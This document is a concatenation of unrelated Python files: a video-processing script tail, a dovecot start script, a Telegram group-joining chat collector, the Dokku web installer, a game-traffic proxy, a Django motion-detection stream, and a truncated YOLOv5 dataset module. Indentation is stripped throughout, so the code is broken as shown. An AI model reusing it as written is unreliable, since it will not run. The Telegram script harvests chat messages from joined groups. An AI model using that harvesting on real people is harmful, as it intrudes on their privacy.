create_dir( args.output_directory + div + args.log_directory, logging=False )
# Identify all videos to process
if len( args.input_list ) > 0:
if args.gpu_count > 1:
video_list = split_image_list( args.input_list, args.gpu_count, args.output_directory )
else:
video_list = [ args.input_list ]
is_image_list = True
elif len( args.input_dir ) > 0:
video_list = list_videos_in_dir( args.input_dir, args.video_exts )
is_image_list = False
else:
video_list = [ args.input_video ]
is_image_list = False
if len( video_list ) == 0:
exit_with_error( "No videos found for ingest in given folder, exiting." )
elif not is_image_list:
if not args.init_db:
log_info( lb1 )
video_str = " video" if len( video_list ) == 1 else " videos"
log_info( "Processing " + str( len( video_list ) ) + video_str + lb2 )
elif not args.build_index:
log_info( lb1 )
# Check for local pipelines and pre-reqs present
if "_local.pipe" in args.pipeline:
if not os.path.exists( "category_models/detector.pipe" ):
if has_file_with_extension( "category_models", "svm" ):
if args.pipeline.endswith( "detector_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "detector_svm_models.pipe" )
elif args.pipeline.endswith( "full_frame_classifier_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "full_frame_classifier_svm.pipe" )
elif args.pipeline.endswith( "tracker_local.pipe" ):
args.pipeline = os.path.join( "pipelines", "tracker_svm_models.pipe" )
else:
exit_with_error( "Use of this script requires training a detector first" )
else:
exit_with_error( "Use of this script requires training a detector first" )
# Process videos in parallel, one per GPU
video_queue = queue.Queue()
for video_name in video_list:
if os.path.isfile( video_name ) or os.path.isdir( video_name ):
video_queue.put( video_name )
else:
log_info( "Skipping unknown input: " + video_name + lb )
def process_video_thread( gpu, cpu ):
while True:
try:
video_name = video_queue.get_nowait()
except queue.Empty:
break
process_video_kwiver( video_name, args, is_image_list,
cpu=cpu, gpu=gpu, write_track_time=not is_image_list )
gpu_thread_list = [ i for i in range( args.gpu_count ) for _ in range( args.pipes ) ]
cpu_thread_list = list( range( args.pipes ) ) * args.gpu_count
threads = [ threading.Thread( target = process_video_thread, args = (gpu,cpu,) )
for gpu, cpu in zip( gpu_thread_list, cpu_thread_list ) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
if is_image_list:
if args.gpu_count > 1: # Each thread outputs 1 list, add multiple
add_final_list_csv( args, video_list )
for image_list in video_list: # Clean up after split_image_list
os.unlink( image_list )
if not video_queue.empty():
exit_with_error( "Some videos were not processed!" )
# Build out detection vs time plots for both detections and tracks
if args.detection_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for detections" )
detection_plot_dir = os.path.join( args.output_directory, "detection_plots" )
create_dir( detection_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
detection_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = detection_ext, top_category_only = False )
if args.track_plots:
import generate_detection_plots
log_info( lb1 + "Generating data plots for tracks" )
track_plot_dir = os.path.join( args.output_directory, "track_plots" )
create_dir( track_plot_dir, logging=False, recreate=True, prompt=False )
generate_detection_plots.detection_plot( args.output_directory,
track_plot_dir, args.objects.split( "," ), float( args.plot_threshold ),
float( args.frame_rate ), int( args.smooth ),
ext = track_ext, top_category_only = True )
if args.detection_plots or args.track_plots:
log_info( lb1 )
# Build searchable index
if args.build_index:
log_info( lb1 + "Building searchable index" + lb2 )
if len( args.log_directory ) > 0 and args.log_directory != "PIPE":
index_log_file = args.output_directory + div + args.log_directory + div + "smqtk_indexer.txt"
else:
index_log_file = ""
if args.ball_tree:
print( "Warning: building a ball tree is deprecated" )
if not database_tool.build_standard_index( remove_quotes( args.install_dir ),
log_file = index_log_file ):
exit_with_error( "Unable to build index" )
# Output complete message
if os.name == 'nt':
log_info( lb1 + "Processing complete, close this window before launching any GUI." + lb2 )
else:
log_info( lb1 + "Processing complete" + lb2 )
|
start.py
|
#!/usr/bin/python3
import os
import glob
import multiprocessing
import logging as log
import sys
from podop import run_server
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(8)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/dovecot/§"
run_server(0, "dovecot", "/tmp/podop.socket", [
("quota", "url", url ),
("auth", "url", url),
("sieve", "url", url),
])
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.resolve_address(os.environ.get("HOST_FRONT", "front"))
os.environ["REDIS_ADDRESS"] = system.resolve_address(os.environ.get("HOST_REDIS", "redis"))
os.environ["ADMIN_ADDRESS"] = system.resolve_address(os.environ.get("HOST_ADMIN", "admin"))
os.environ["ANTISPAM_ADDRESS"] = system.resolve_address(os.environ.get("HOST_ANTISPAM", "antispam:11334"))
if os.environ["WEBMAIL"] != "none":
os.environ["WEBMAIL_ADDRESS"] = system.resolve_address(os.environ.get("HOST_WEBMAIL", "webmail"))
for dovecot_file in glob.glob("/conf/*.conf"):
conf.jinja(dovecot_file, os.environ, os.path.join("/etc/dovecot", os.path.basename(dovecot_file)))
os.makedirs("/conf/bin", exist_ok=True)
for script_file in glob.glob("/conf/*.script"):
out_file = os.path.join("/conf/bin/", os.path.basename(script_file).replace('.script',''))
conf.jinja(script_file, os.environ, out_file)
os.chmod(out_file, 0o555)
# Run Podop, then postfix
multiprocessing.Process(target=start_podop).start()
os.system("chown mail:mail /mail")
os.system("chown -R mail:mail /var/lib/dovecot /conf")
os.execv("/usr/sbin/dovecot", ["dovecot", "-c", "/etc/dovecot/dovecot.conf", "-F"])
|
Connector.py
|
# -*- coding:utf-8 -*-
import codecs
import datetime
import json
import sched
import optparse
import os
import time
import TelethonB
import threading
import sys
from telethon import TelegramClient
from telethon import errors
from telethon.tl.functions.channels import LeaveChannelRequest
from telethon.tl.functions.channels import JoinChannelRequest
class TelegramOperator:
#Debugging Methods & co
def return_values(self, objekt):
for thing in dir(objekt):
print(thing+" : "+str(getattr(objekt, thing)))
def clear_terminal(self):
os.system('cls' if os.name == 'nt' else 'clear')
#end of debugging
def __init__(self):
#self.print_lock = threading.Lock()
settings = self.read_settings()
try:
settings["telegram_api"] = int(settings["telegram_api"])
except ValueError:
print("[!] API Code is incorrect. Please check config.txt and correct the error!")
sys.exit()
self.client = TelegramClient(settings["username"], settings["telegram_api"], settings["api_hash"])
self.client.start()
self.msg_avg_deviation = settings["min_activity"]
self.msg_average = self.calc_average()
self.groups = list()
self.leftout_groups = set()
self.dialog_names = set()
self.blacklist = self.load_blocked_groups()
self.initialize_run()
self.leave = False
def create_settings(self):
default = {"telegram_api":"Your api here",
"api_hash": "Your hash here",
"username":"Your username here",
"#1/Xth ot the average activity(messages per runtime) required to not be marked as inactive. default: 1/3th":"",
"min_activity":"3",
}
with codecs.open("config.txt", "w", encoding="utf-8") as config:
for key in default:
if default[key] != "":
config.write("{}={}\n".format(key, default[key]))
else:
config.write("{}\n".format(key))
print("[*] Please fill in your api data into the config.txt")
def read_settings(self):
settings = dict()
try:
with codecs.open("config.txt", "r", encoding="utf-8") as config:
data = config.readlines()
for entry in data:
if "#" not in entry:
entry = [entry.strip() for entry in entry.split("=")]
settings[entry[0]] = entry[1]
config.close()
except FileNotFoundError:
print("[!] config.txt not found. Creating it...")
self.create_settings()
sys.exit()
return settings
def write_data(self, data, filename):
with codecs.open(filename, "w", encoding="utf-8") as output:
for dataset in data:
if len(dataset) > 0:
if isinstance(dataset, list):
temp = ""
for ele in dataset:
temp += ele+";"
dataset = temp[:-2]
print(dataset)
output.write(str(dataset)+"\n")
def get_highest_chatblock(self):
try:
block_number = max([int(filename.split("-")[1]) for filename in os.listdir() if "chat_block" in filename])+1
return block_number
except ValueError:
return 0
def join_groups(self, groups, blacklist):
"""Tries to join groups if it is not blacklisted"""
floodwait = False
for group in groups:
if group not in blacklist and group not in self.dialog_names:
if not floodwait:
print("[*] Trying to join {}..".format(group))
try:
channel = self.client.get_entity(group)
self.client(JoinChannelRequest(channel))
self.dialog_names.add(group) #avoid trying to join the same group twice
print(" [+]->Succesfully joined {} ".format(group))
except errors.rpc_error_list.FloodWaitError as e:
floodwait = True
self.leftout_groups.add(group)
date = datetime.datetime.now()
self.block = date + datetime.timedelta(seconds = e.seconds) #adds waittime to current time to determine the date when the block ends
print(" [!]->"+str(e))
except errors.rpc_error_list.UsernameInvalidError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
except errors.rpc_error_list.UsernameNotOccupiedError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
except TypeError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
except errors.rpc_error_list.InviteHashExpiredError as e:
self.blacklist.add(group)
print(" [!]->"+str(e))
else:
self.leftout_groups.add(group)
def collect_data(self):
"""Gathers the saved data from each channel and writes it to files"""
chatoutput = list()
blacklist = set()
join_groups = self.read_leftout_groups()
metadata = list()
for channel in self.groups:
if channel.active:
self.blacklist = self.blacklist.union(channel.groups_blocked)
join_groups = join_groups.union(channel.groups)
chatoutput.append(channel.output)
metadata.append(channel.metadata)
else:
if self.leave:
self.leavechannel(channel.dialog)
self.join_groups(join_groups, blacklist)
self.write_data(self.blacklist, "blocked_groups")
self.write_data(metadata, "groups.meta")
block_number = self.get_highest_chatblock()
self.write_data(chatoutput, "chat_block-{}".format(block_number))
self.write_leftout_groups()
def leavechannel(self, dialog):
try:
self.client(LeaveChannelRequest(dialog.entity))
self.blacklist.add(dialog.name)
print("[*] Left Channel: {}".format(dialog.name))
except RuntimeError as e:
print(e)
def calc_average(self):
try:
with codecs.open("groups.meta", "r", encoding="utf-8") as readfile:
numbers = [entry.split(";")[1] for entry in readfile.readlines() if len(entry) > 6]
readfile.close()
if len(numbers) == 0:
return 0
sum = 0
for number in numbers:
sum += int(number)
return sum/len(numbers)
except FileNotFoundError:
return 0
def check_groups(self):
dialogs = self.client.get_dialogs(limit=5000)
for dialog in dialogs:
print(dialog.name)
def load_blocked_groups(self):
"""Loads the blacklisted groups into the memory"""
print(" ->[*] Loading group blacklist...")
blacklist = set()
if os.access("blocked_groups", os.F_OK):
with codecs.open("blocked_groups", "r", encoding="utf-8") as groups:
blocked_groups = groups.readlines()
for group in blocked_groups:
blacklist.add(group)
return blacklist
def initialize_run(self):
"""Loads dialogs and starts them one after the other"""
dialogs = self.client.get_dialogs(limit=5000)
self.groups = list()
for dialog in dialogs:
try:
self.groups.append(TelethonB.Channel(dialog, self.msg_average, self.msg_avg_deviation, self.client)) #Creates list of channel objects
self.dialog_names.add(dialog.name)
except TypeError as e:
print(e)
continue
except RuntimeError as e:
print(e)
continue
print("[+] All groups successfully initialized!")
def run_multi(self, count, leave):
self.leave = leave
threads = list()
for channel in self.groups:
thread = threading.Thread(target=channel.run, args=(count,))
threads.append(thread)
for thread in threads: #Starts Threads
thread.start()
for thread in threads: #Joins threads so further action will be made, after all Threads are finished
print("[*] Joining {}/{}".format(thread.name, str(len(threads))))
thread.join()
self.collect_data()
threads = [] #empty thread list
print("_--------------------all finished-------------------_")
def write_leftout_groups(self):
with codecs.open("leftout_groups", "w", encoding="utf-8") as output:
for group in self.leftout_groups:
output.write(group+"\n")
def read_leftout_groups(self):
if os.access("leftout_groups", os.F_OK):
with codecs.open("leftout_groups", "r", encoding="utf-8") as input:
groups = input.readlines()
return set(groups)
else:
return set()
def run(self, count, leave):
self.read_leftout_groups()
self.leave = leave
for channel in self.groups:
print("[+] Running Channel: {}".format(channel.name))
channel.run(count)
self.collect_data()
print("_--------------------all finished-------------------_")
def main():
parser = optparse.OptionParser("usage: {} -m <0/1> (0=single-, 1=multiprocessing) -t <time in seconds> -r <repetitions> -l <0/1>".format(os.path.basename(__file__)))
parser.add_option("-m", dest="tgtMode", type="int", help="choose runmode, 0 for singleprocessed, 1 for multiprocessed")
parser.add_option("-t", dest="tgtTime", type="int", help="Specify wait time between runs")
parser.add_option("-r", dest="tgtRep", type="int", help="Specify how often the the software is run")
parser.add_option("-l", dest="tgtLeave", type="int", help="0 to stay in inactive groups, 1 to leave inactive groups")
(options, args) = parser.parse_args()
tgtMode = options.tgtMode
seconds = options.tgtTime
tgtRep = options.tgtRep
tgtLeave = options.tgtLeave
if (tgtMode == None) | (tgtRep == None) | (seconds == 0 and tgtRep > 1) | (tgtLeave != None and tgtLeave != 0 and tgtLeave != 1) | (tgtMode != 1 and tgtMode != 0):
print(parser.usage)
exit(0)
if tgtLeave == None: #Don't leave groups on default
print("No arguments for -l -> Default set to False, inactive groups won't be left")
leave = False
elif tgtLeave == 1:
leave = True
elif tgtLeave == 0:
leave = False
count = 0
while(count<tgtRep):
top = TelegramOperator() #Object is recreated every time to reset the data
s = sched.scheduler(time.time, time.sleep)
if tgtMode == 0:
s.enter(seconds, 1, top.run, (count,leave,))
elif tgtMode == 1:
s.enter(seconds, 1, top.run_multi, (count,leave,))
print("Running in {} seconds".format(seconds))
s.run()
count+=1
if __name__ == "__main__":
main()
|
dokku-installer.py
|
#!/usr/bin/env python3
import cgi
import json
import os
import re
import shutil
try:
import SimpleHTTPServer
import SocketServer
except ImportError:
import http.server as SimpleHTTPServer
import socketserver as SocketServer
import subprocess
import sys
import threading
VERSION = 'v0.24.3'
def bytes_to_string(b):
if type(b) == bytes:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
b = b.decode(encoding)
b = b.strip()
return b
def string_to_bytes(s):
if type(s) == str:
encoding = sys.stdout.encoding
if encoding is None:
encoding = 'utf-8'
s = s.encode(encoding)
return s
hostname = ''
try:
command = "bash -c '[[ $(dig +short $HOSTNAME) ]] && echo $HOSTNAME || wget -q -O - icanhazip.com'"
hostname = bytes_to_string(subprocess.check_output(command, shell=True))
except subprocess.CalledProcessError:
pass
key_file = os.getenv('KEY_FILE', None)
if os.path.isfile('/home/ec2-user/.ssh/authorized_keys'):
key_file = '/home/ec2-user/.ssh/authorized_keys'
elif os.path.isfile('/home/ubuntu/.ssh/authorized_keys'):
key_file = '/home/ubuntu/.ssh/authorized_keys'
else:
key_file = '/root/.ssh/authorized_keys'
admin_keys = []
if os.path.isfile(key_file):
try:
command = "cat {0}".format(key_file)
admin_keys = bytes_to_string(subprocess.check_output(command, shell=True)).strip().split("\n")
except subprocess.CalledProcessError:
pass
ufw_display = 'block'
try:
command = "sudo ufw status"
ufw_output = bytes_to_string(subprocess.check_output(command, shell=True).strip())
if "inactive" in ufw_output:
ufw_display = 'none'
except subprocess.CalledProcessError:
ufw_display = 'none'
nginx_dir = '/etc/nginx'
nginx_init = '/etc/init.d/nginx'
try:
command = "test -x /usr/bin/openresty"
subprocess.check_output(command, shell=True)
nginx_dir = '/usr/local/openresty/nginx/conf'
nginx_init = '/etc/init.d/openresty'
except subprocess.CalledProcessError:
pass
def check_boot():
if 'onboot' not in sys.argv:
return
init_dir = os.getenv('INIT_DIR', '/etc/init')
systemd_dir = os.getenv('SYSTEMD_DIR', '/etc/systemd/system')
nginx_conf_dir = os.getenv('NGINX_CONF_DIR', '{0}/conf.d'.format(nginx_dir))
if os.path.exists(init_dir):
with open('{0}/dokku-installer.conf'.format(init_dir), 'w') as f:
f.write("start on runlevel [2345]\n")
f.write("exec {0} selfdestruct\n".format(os.path.abspath(__file__)))
if os.path.exists(systemd_dir):
with open('{0}/dokku-installer.service'.format(systemd_dir), 'w') as f:
f.write("[Unit]\n")
f.write("Description=Dokku web-installer\n")
f.write("\n")
f.write("[Service]\n")
f.write("ExecStart={0} selfdestruct\n".format(os.path.abspath(__file__)))
f.write("\n")
f.write("[Install]\n")
f.write("WantedBy=multi-user.target\n")
f.write("WantedBy=graphical.target\n")
if os.path.exists(nginx_conf_dir):
with open('{0}/dokku-installer.conf'.format(nginx_conf_dir), 'w') as f:
f.write("upstream dokku-installer { server 127.0.0.1:2000; }\n")
f.write("server {\n")
f.write(" listen 80;\n")
f.write(" location / {\n")
f.write(" proxy_pass http://dokku-installer;\n")
f.write(" }\n")
f.write("}\n")
subprocess.call('rm -f {0}/sites-enabled/*'.format(nginx_dir), shell=True)
sys.exit(0)
class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def write_content(self, content):
try:
self.wfile.write(content)
except TypeError:
self.wfile.write(string_to_bytes(content))
def do_GET(self):
content = PAGE.replace('{VERSION}', VERSION)
content = content.replace('{UFW_DISPLAY}', ufw_display)
content = content.replace('{HOSTNAME}', hostname)
content = content.replace('{AUTHORIZED_KEYS_LOCATION}', key_file)
content = content.replace('{ADMIN_KEYS}', "\n".join(admin_keys))
self.send_response(200)
self.end_headers()
self.write_content(content)
def do_POST(self):
if self.path not in ['/setup', '/setup/']:
return
params = cgi.FieldStorage(fp=self.rfile,
headers=self.headers,
environ={
'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type']})
dokku_root = os.getenv('DOKKU_ROOT', '/home/dokku')
dokku_user = os.getenv('DOKKU_SYSTEM_GROUP', 'dokku')
dokku_group = os.getenv('DOKKU_SYSTEM_USER', 'dokku')
vhost_enable = 'false'
vhost_filename = '{0}/VHOST'.format(dokku_root)
if 'vhost' in params and params['vhost'].value == 'true':
vhost_enable = 'true'
with open(vhost_filename, 'w') as f:
f.write(params['hostname'].value.strip("/"))
shutil.chown(vhost_filename, dokku_user, dokku_group)
else:
try:
os.remove(vhost_filename)
except OSError:
pass
hostname_filename = '{0}/HOSTNAME'.format(dokku_root)
with open(hostname_filename, 'w') as f:
f.write(params['hostname'].value.strip("/"))
shutil.chown(hostname_filename, dokku_user, dokku_group)
for (index, key) in enumerate(params['keys'].value.splitlines(), 1):
user = 'admin'
if self.admin_user_exists() is not None:
user = 'web-admin'
if self.web_admin_user_exists() is not None:
index = int(self.web_admin_user_exists()) + 1
elif self.web_admin_user_exists() is None:
index = 1
elif self.admin_user_exists() is None:
pass
else:
index = int(self.admin_user_exists()) + 1
user = user + str(index)
command = ['sshcommand', 'acl-add', 'dokku', user]
proc = subprocess.Popen(command, stdin=subprocess.PIPE)
try:
proc.stdin.write(key)
except TypeError:
proc.stdin.write(string_to_bytes(key))
proc.stdin.close()
proc.wait()
set_debconf_selection('boolean', 'nginx_enable', 'true')
set_debconf_selection('boolean', 'skip_key_file', 'true')
set_debconf_selection('boolean', 'vhost_enable', vhost_enable)
set_debconf_selection('boolean', 'web_config', 'false')
set_debconf_selection('string', 'hostname', params['hostname'].value)
if 'selfdestruct' in sys.argv:
DeleteInstallerThread()
content = json.dumps({'status': 'ok'})
self.send_response(200)
self.end_headers()
self.write_content(content)
def web_admin_user_exists(self):
return self.user_exists('web-admin(\d+)')
def admin_user_exists(self):
return self.user_exists('admin(\d+)')
def user_exists(self, name):
command = 'dokku ssh-keys:list'
pattern = re.compile(r'NAME="' + name + '"')
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
max_num = 0
exists = False
for line in proc.stdout:
m = pattern.search(bytes_to_string(line))
if m:
# User of the form `user` or `user#` exists
exists = True
max_num = max(max_num, int(m.group(1)))
if exists:
return max_num
else:
return None
def set_debconf_selection(debconf_type, key, value):
found = False
with open('/etc/os-release', 'r') as f:
for line in f:
if 'debian' in line:
found = True
if not found:
return
ps = subprocess.Popen(['echo', 'dokku dokku/{0} {1} {2}'.format(
key, debconf_type, value
)], stdout=subprocess.PIPE)
try:
subprocess.check_output(['debconf-set-selections'], stdin=ps.stdout)
except subprocess.CalledProcessError:
pass
ps.wait()
class DeleteInstallerThread(object):
def __init__(self, interval=1):
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
command = "rm {0}/conf.d/dokku-installer.conf && {1} stop && {1} start".format(nginx_dir, nginx_init)
try:
subprocess.call(command, shell=True)
except:
pass
command = "rm -f /etc/init/dokku-installer.conf /etc/systemd/system/dokku-installer.service && (stop dokku-installer || systemctl stop dokku-installer.service)"
try:
subprocess.call(command, shell=True)
except:
pass
def main():
check_boot()
port = int(os.getenv('PORT', 2000))
httpd = SocketServer.TCPServer(("", port), GetHandler)
print("Listening on 0.0.0.0:{0}, CTRL+C to stop".format(port))
httpd.serve_forever()
PAGE = """
<html>
<head>
<meta charset="utf-8" />
<title>Dokku Setup</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<style>
.bd-callout {
padding: 1.25rem;
margin-top: 1.25rem;
margin-bottom: 1.25rem;
border: 1px solid #eee;
border-left-width: .25rem;
border-radius: .25rem;
}
.bd-callout p:last-child {
margin-bottom: 0;
}
.bd-callout-info {
border-left-color: #5bc0de;
}
pre {
font-size: 80%;
margin-bottom: 0;
}
h1 small {
font-size: 50%;
}
h5 {
font-size: 1rem;
}
.container {
width: 640px;
}
.result {
padding-left: 20px;
}
input.form-control, textarea.form-control {
background-color: #fafbfc;
font-size: 14px;
}
input.form-control::placeholder, textarea.form-control::placeholder {
color: #adb2b8
}
</style>
</head>
<body>
<div class="container">
<form id="form" role="form">
<h1 class="pt-3">Dokku Setup <small class="text-muted">{VERSION}</small></h1>
<div class="alert alert-warning small" role="alert">
<strong>Warning:</strong> The SSH key filled out here can grant root access to the server. Please complete the setup as soon as possible.
</div>
<div class="row">
<div class="col">
<h3>Admin Access</h3>
<div class="form-group">
<label for="key">Public SSH Keys</label><br />
<textarea class="form-control" name="keys" rows="5" id="key" placeholder="Begins with 'ssh-rsa', 'ssh-dss', 'ssh-ed25519', 'ecdsa-sha2-nistp256', 'ecdsa-sha2-nistp384', or 'ecdsa-sha2-nistp521'">{ADMIN_KEYS}</textarea>
<small class="form-text text-muted">Public keys allow users to ssh onto the server as the <code>dokku</code> user, as well as remotely execute Dokku commands. They are currently auto-populated from: <code>{AUTHORIZED_KEYS_LOCATION}</code>, and can be changed later via the <a href="https://dokku.com/docs/deployment/user-management/" target="_blank"><code>dokku ssh-keys</code></a> plugin.</small>
</div>
</div>
</div>
<div class="row">
<div class="col">
<h3>Hostname Configuration</h3>
<div class="form-group">
<label for="hostname">Hostname</label>
<input class="form-control" type="text" id="hostname" name="hostname" value="{HOSTNAME}" placeholder="A hostname or ip address such as {HOSTNAME}" />
<small class="form-text text-muted">This will be used as the default host for all applications, and can be changed later via the <a href="https://dokku.com/docs/configuration/domains/" target="_blank"><code>dokku domains:set-global</code></a> command.</small>
</div>
<div class="form-check">
<input class="form-check-input" type="checkbox" id="vhost" name="vhost" value="true">
<label class="form-check-label" for="vhost">Use virtualhost naming for apps</label>
<small class="form-text text-muted">When enabled, Nginx will be run on port 80 and proxy requests to apps based on hostname.</small>
<small class="form-text text-muted">When disabled, a specific port will be setup for each application on first deploy, and requests to that port will be proxied to the relevant app.</small>
</div>
<div class="alert alert-warning small mt-3 d-{UFW_DISPLAY}" role="alert">
<strong>Warning:</strong> UFW is active. To allow traffic to specific ports, run <code>sudo ufw allow PORT</code> for the port in question.
</div>
<div class="bd-callout bd-callout-info">
<h5>What will app URLs look like?</h5>
<pre><code id="example">http://hostname:port</code></pre>
</div>
</div>
</div>
<button type="button" onclick="setup()" class="btn btn-primary">Finish Setup</button> <span class="result"></span>
</form>
</div>
<div id="error-output"></div>
<script>
var $ = document.querySelector.bind(document)
function setup() {
if ($("#key").value.trim() == "") {
alert("Your admin public key cannot be blank.")
return
}
if ($("#hostname").value.trim() == "") {
alert("Your hostname cannot be blank.")
return
}
var data = new FormData($("#form"))
var inputs = [].slice.call(document.querySelectorAll("input, textarea, button"))
inputs.forEach(function (input) {
input.disabled = true
})
var result = $(".result")
fetch("/setup", {method: "POST", body: data})
.then(function(response) {
if (response.ok) {
return response.json()
} else {
throw new Error('Server returned error')
}
})
.then(function(response) {
result.classList.add("text-success");
result.textContent = "Success! Redirecting in 3 seconds. .."
setTimeout(function() {
window.location.href = "https://dokku.com/docs~{VERSION}/deployment/application-deployment/";
}, 3000);
})
.catch(function (error) {
result.classList.add("text-danger");
result.textContent = "Could not send the request"
})
}
function update() {
if ($("#vhost").matches(":checked") && $("#hostname").value.match(/^(\d{1,3}\.){3}\d{1,3}$/)) {
alert("In order to use virtualhost naming, the hostname must not be an IP but a valid domain name.")
$("#vhost").checked = false;
}
if ($("#vhost").matches(':checked')) {
$("#example").textContent = "http://<app-name>."+$("#hostname").value
} else {
$("#example").textContent = "http://"+$("#hostname").value+":<app-port>"
}
}
$("#vhost").addEventListener("change", update);
$("#hostname").addEventListener("input", update);
update();
</script>
</body>
</html>
"""
if __name__ == "__main__":
main()
|
network.py
|
import socket
import threading
from typing import *
from utils.protocol import iter_packets_from_socket, sessions, local
def forward(source: socket.socket, destination: socket.socket,
process: Callable[[bytes], bytes], session_id: int, direction: int):
"""
direction: 0:c2s, 1:s2c
receive packets from source, process them using process function and send them to destination
note: process function should receive a FULL network packet and return a FULL network packet.
there is a auto_unpack_pack function you can use to simplify this process
"""
local.session_id = session_id
local.direction = direction
local.source = source
local.destination = destination
if local.session_id not in sessions:
sessions[local.session_id] = {'state': 0, 'compression_threshold': -1, 'dimension': 0, 'username': ''}
for packet in iter_packets_from_socket(local.source):
try:
packet = process(packet)
except KeyError:
continue
# if discard, like chunk data ack packet. we dont want mc server to receive this kind of packet
if not packet:
continue
try:
local.destination.sendall(packet)
except OSError:
break
except ConnectionAbortedError:
break
local.source.close()
local.destination.close()
if local.session_id in sessions:
del sessions[local.session_id]
def proxy(listen_ip: str, listen_port: int, dst_ip: str, dst_port: int,
s2c_process: Callable[[bytes], bytes], c2s_process: Callable[[bytes], bytes]):
"""
a proxy that forwards data
"""
session_id = 0
while True:
try:
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
proxy_socket.bind((listen_ip, listen_port))
proxy_socket.listen(5)
while True:
client_socket = proxy_socket.accept()[0]
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.connect((dst_ip, dst_port))
threading.Thread(target=forward, args=(client_socket, server_socket, c2s_process, session_id, 0)).start()
threading.Thread(target=forward, args=(server_socket, client_socket, s2c_process, session_id, 1)).start()
session_id += 1
finally:
pass
|
views.py
|
from django.shortcuts import render
# Create your views here.
from django.shortcuts import render
from django.http import StreamingHttpResponse
from .models import SingleMotionDetector
from imutils.video import VideoStream
import threading
import datetime
import imutils
import time
import cv2
# initialize the output frame and a lock used to ensure thread-safe
# exchanges of the output frames (useful when multiple browsers/tabs
# are viewing the stream)
outputFrame = None
lock = threading.Lock()
# initialize the video stream and allow the camera sensor to warmup
# vs = VideoStream(usePiCamera=1).start()
vs = VideoStream(src=0).start()
time.sleep(2.0)
def index(request):
# return the rendered template
return render(request, 'motion_detect/index.html')
def detect_motion(frameCount):
# grab global references to the video stream, output frame, and
# lock variables
global vs, outputFrame, lock
# initialize the motion detector and the total number of frames read thus far
md = SingleMotionDetector(accumWeight=0.1)
total = 0
# loop over frames from the video stream
while True:
# read the next frame from the video stream, resize it, convert the frame to grayscale, and blur it
frame = vs.read()
frame = imutils.resize(frame, width=400)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# if the total number of frames has reached a sufficient number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = md.detect(gray)
# check to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the "motion area" on the output frame
(thresh, (minX, minY, maxX, maxY)) = motion
cv2.rectangle(frame, (minX, minY), (maxX, maxY),
(0, 0, 255), 2)
# update the background model and increment the total number of frames read thus far
md.update(gray)
total += 1
# acquire the lock, set the output frame, and release the lock
with lock:
outputFrame = frame.copy()
def generate():
# grab global references to the output frame and lock variables
global outputFrame, lock
# loop over frames from the output stream
while True:
# wait until the lock is acquired
with lock:
# check if the output frame is available, otherwise skip
# the iteration of the loop
if outputFrame is None:
continue
# encode the frame in JPEG format
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
# ensure the frame was successfully encoded
if not flag:
continue
# yield the output frame in the byte format
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' + bytearray(encodedImage) + b'\r\n')
def video_feed(request):
# return the response generated along with the specific media
# type (mime type)
return StreamingHttpResponse(generate(), content_type='multipart/x-mixed-replace; boundary=frame')
t = threading.Thread(target=detect_motion, kwargs={'frameCount': 32})
t.daemon = True
t.start()
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
